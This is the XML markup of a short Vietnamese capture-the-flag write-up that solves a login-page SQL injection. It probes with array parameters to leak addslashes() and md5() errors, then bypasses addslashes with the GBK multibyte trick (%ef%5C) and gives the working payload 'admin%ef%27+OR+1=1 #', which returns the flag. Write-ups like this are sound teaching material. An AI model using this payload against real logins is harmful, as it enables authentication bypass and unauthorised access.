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4BEB" w14:textId="6585FA9F" w:rsidR="002F49FE" w:rsidRPr="007538ED" w:rsidRDefault="00E92ECD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Bài này khó.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FEC8CC9" w14:textId="0A506984" w:rsidR="00E92ECD" w:rsidRPr="007538ED" w:rsidRDefault="00E92ECD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Để kt lỗ hổng sql injection, thêm mảng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73460490" w14:textId="43897959" w:rsidR="00E92ECD" w:rsidRPr="007538ED" w:rsidRDefault="00E92ECD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Login[]=’&amp;password[]=abc</w:t>
      </w:r>
      <w:r w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Báo lỗi </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C011AC2" w14:textId="10571D22" w:rsidR="00E92ECD" w:rsidRPr="007538ED" w:rsidRDefault="00E92ECD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 xml:space="preserve">addslashes() expects parameter 1 to be string, array given in </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790548FC" w14:textId="600AEF79" w:rsidR="00636920" w:rsidRPr="007538ED" w:rsidRDefault="00636920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md5() expects parameter 1 to be string, array given in</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E91E20E" w14:textId="5D99F88B" w:rsidR="00636920" w:rsidRPr="007538ED" w:rsidRDefault="00636920">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="76E0D4F1" w14:textId="21A2750C" w:rsidR="00636920" w:rsidRPr="007538ED" w:rsidRDefault="00636920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Có vẻ như function addslashes dùng ở trường login, còn md5 ở trường password. Nhưng chúng ta chỉ cần bypass addslashes là được, còn mk comment lại là xong.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70711C1B" w14:textId="1144D941" w:rsidR="00636920" w:rsidRPr="007538ED" w:rsidRDefault="00636920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 xml:space="preserve">Dấu nháy %27 </w:t>
      </w:r>
      <w:r w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>%5C%27 (\’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194F415F" w14:textId="60C4E9B8" w:rsidR="00636920" w:rsidRPr="007538ED" w:rsidRDefault="00636920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 xml:space="preserve">Ứng dụng dùng GBK để mã hóa ,để </w:t>
      </w:r>
      <w:r w:rsidR="001B148C" w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">bypass </w:t>
      </w:r>
      <w:r w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>dc filter này,</w:t>
      </w:r>
      <w:r w:rsidR="001B148C" w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> phải biến \ thành 1 kí tự khác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D47327F" w14:textId="6E3AEB54" w:rsidR="001B148C" w:rsidRPr="007538ED" w:rsidRDefault="001B148C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Cách làm là thêm %ef (kí tự đồ họa). %ef%5C sẽ thành 1 kí tự trung quốc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6562E070" w14:textId="777B12AE" w:rsidR="001B148C" w:rsidRPr="007538ED" w:rsidRDefault="001B148C">
      <w:pPr>
        <w:rPr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t>Payload: admin%ef%27+OR+1=1 #</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33335F46" w14:textId="1588677E" w:rsidR="00871D8C" w:rsidRDefault="001B148C" w:rsidP="00871D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538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin%ef%5C%27+OR+1=1#--&gt;</w:t>
      </w:r>
      <w:r w:rsidR="00871D8C" w:rsidRPr="007538ED">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidR="00871D8C" w:rsidRPr="007538ED">
        <w:rPr>
          <w:rFonts w:ascii="MS Gothic" w:eastAsia="MS Gothic" w:hAnsi="MS Gothic" w:cs="MS Gothic"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>颸</w:t>
      </w:r>
      <w:r w:rsidR="00871D8C" w:rsidRPr="007538E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‘ OR 1=1#--&gt;Flag.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF70E90" w14:textId="1CF67039" w:rsidR="0046763B" w:rsidRDefault="0046763B" w:rsidP="00871D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353C003E" w14:textId="462E0E7B" w:rsidR="0046763B" w:rsidRPr="007538ED" w:rsidRDefault="0046763B" w:rsidP="00871D8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6763B">
        <w:rPr>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bài này nó dùng hàm addslashes trong php nên mới làm được nha</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47888B81" w14:textId="54DADDA4" w:rsidR="001B148C" w:rsidRDefault="001B148C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="253CC4EF" w14:textId="77777777" w:rsidR="00E92ECD" w:rsidRPr="00E92ECD" w:rsidRDefault="00E92ECD">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00E92ECD" w:rsidRPr="00E92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B9"/>
    <w:rsid w:val="001B148C"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="0046763B"/>
    <w:rsid w:val="00636920"/>
    <w:rsid w:val="007538ED"/>
    <w:rsid w:val="00871D8C"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00C56FB9"/>
    <w:rsid w:val="00E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6833B"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{FF007545-F1E3-FD44-974F-8ACC1CEF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871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2022-10-09T08:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-09-17T15:25:00Z</dcterms:modified>
</cp:coreProperties>
</file>